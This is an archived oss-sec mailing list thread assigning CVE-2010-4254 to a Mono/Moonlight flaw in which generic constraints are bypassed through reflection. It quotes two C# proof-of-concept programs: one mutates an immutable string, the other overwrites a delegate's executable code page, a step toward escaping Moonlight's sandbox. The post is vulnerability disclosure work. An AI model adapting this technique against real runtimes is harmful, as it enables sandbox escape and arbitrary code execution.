oss-sec mailing list archives
Re: CVE request: mono/moonlight: execution of arbitrary code due to mutable Strings
From: Josh Bressers <bressers () redhat com>
Date: Mon, 29 Nov 2010 15:36:20 -0500 (EST)
Please use CVE-2010-4254 for this.
Thanks.
--
JB
----- "Thomas Biege" <thomas () suse de> wrote:
Hello.
Just a copy-n-paste from our bugzilla (again):
------------------------------------------------------------------------------
SP 2010-11-24 20:45:21 UTC
Original (pulled by author) blog entry:
So I was messing around with generic methods and discovered that
generic
constraints can be bypassed on Mono 2.6.7 and 2.8 using reflection
(with the
exception of the new() constraint). One of the fun results of this bug
is that
the String class can be made mutable without using reflection to set
private
members!
The following code demonstrates this; it is legal and will run on Mono
up to
and including version 2.8:
using System;
using System.Reflection;
public class FakeString {
public int length;
public char start_char;
}
public class TestCase {
private static FakeString UnsafeConversion<T>(T thing)
where T : FakeString
{
return thing;
}
public static void Main() {
var a = "foo";
var b = MakeMutable(a);
Console.WriteLine(a);
b.start_char = 'b';
Console.WriteLine(a);
}
private static FakeString MakeMutable(string s)
{
var m = typeof(TestCase).GetMethod("UnsafeConversion",
BindingFlags.NonPublic | BindingFlags.Static);
var m2 = m.MakeGenericMethod(typeof(string));
var d = (Func<string,
FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>),
null,
m2);
return d(s);
}
}
Comment 1 SP 2010-11-24 20:54:20 UTC
This is a follow up of the previous
https://bugzilla.novell.com/show_bug.cgi?id=654136
The original blog entry allow trusted (by moonlight) code to mutate
strings
which could be used to trick policies (e.g. give a valid URL and, once
accepted
as a valid xdomain URL, change it to something else).
It can also be extended to arbitrary code execution. POC by Geoff
Norton:
using System;
using System.Reflection;
using System.Runtime.InteropServices;
public class DelegateWrapper {
public IntPtr method_ptr;
}
public delegate void MethodWrapper ();
public class BreakSandbox {
private static DelegateWrapper Convert <T> (T dingus) where T :
DelegateWrapper {
return dingus;
}
private static DelegateWrapper ConvertDelegate (Delegate del) {
var m = typeof (BreakSandbox).GetMethod ("Convert",
BindingFlags.NonPublic | BindingFlags.Static);
var gm = m.MakeGenericMethod (typeof (Delegate));
var d = (Func <Delegate, DelegateWrapper>)
Delegate.CreateDelegate
(typeof (Func <Delegate, DelegateWrapper>), null, gm);
return d (del);
}
public static void Main (string [] args) {
MethodWrapper d = delegate {
Console.WriteLine ("Hello");
};
d ();
var converted = ConvertDelegate (d);
// Overwrite the already WX page with a 'ret'
Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
d ();
}
}
This code won't execute on Moonlight (since all Marshal.* code is
SecurityCritical) but it would not be hard to modify the POC to do the
same
without SecurityCritical code.
Note: the bug is present in Mono but does not represent a security
vulnerability there since Mono (unlike Moonlight) can only execute
trusted
code.
[reply] [-]
Private
Comment 2
------------------------------------------------------------------------------
--
Thomas Biege <thomas () suse de>, SUSE LINUX, Security Support &
Auditing
SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
--
Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
-- Marie von Ebner-Eschenbach
Current thread:
- Re: CVE request: mono/moonlight: execution of arbitrary code due to mutable Strings Josh Bressers (Nov 29)